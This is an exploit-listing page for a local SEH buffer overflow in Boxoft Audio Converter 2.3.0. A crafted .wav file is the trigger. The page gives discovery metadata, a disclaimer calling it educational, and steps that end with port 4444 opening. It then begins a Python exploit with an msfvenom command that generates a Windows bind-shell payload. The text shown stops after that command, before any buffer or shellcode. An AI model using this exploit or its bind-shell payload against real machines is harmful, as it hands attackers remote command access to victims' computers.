Exploits / Vulnerability Discovered : 2020-11-23 |
Type : local |
Platform : windows
This exploit / vulnerability Boxoft audio converter 2.3.0 .wav buffer overflow (seh) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)
# Discovery by: Luis Martinez
# Discovery Date: 2020-11-22
# Vendor Homepage: http://www.boxoft.com/
# Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe
# Tested Version: 2.3.0
# Vulnerability Type: Local Buffer Overflow (SEH)
# Tested on OS: Windows 10 Pro (10.0.18362) x64 en
# Steps to Produce the Local Buffer Overflow (SEH):
# 1.- Run python code: Boxotf_Audio_Converter_2.3.0.py
# 2.- Open AudioConvert.exe
# 3.- Try
# 4.- Batch Convert Mode -> Next
# 5.- Add
# 6.- Select Boxotf_Audio_Converter_2.3.0.wav -> Open
# 7.- Port 4444 open
#!/usr/bin/env python
#-*-coding: utf-8-*-
#msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c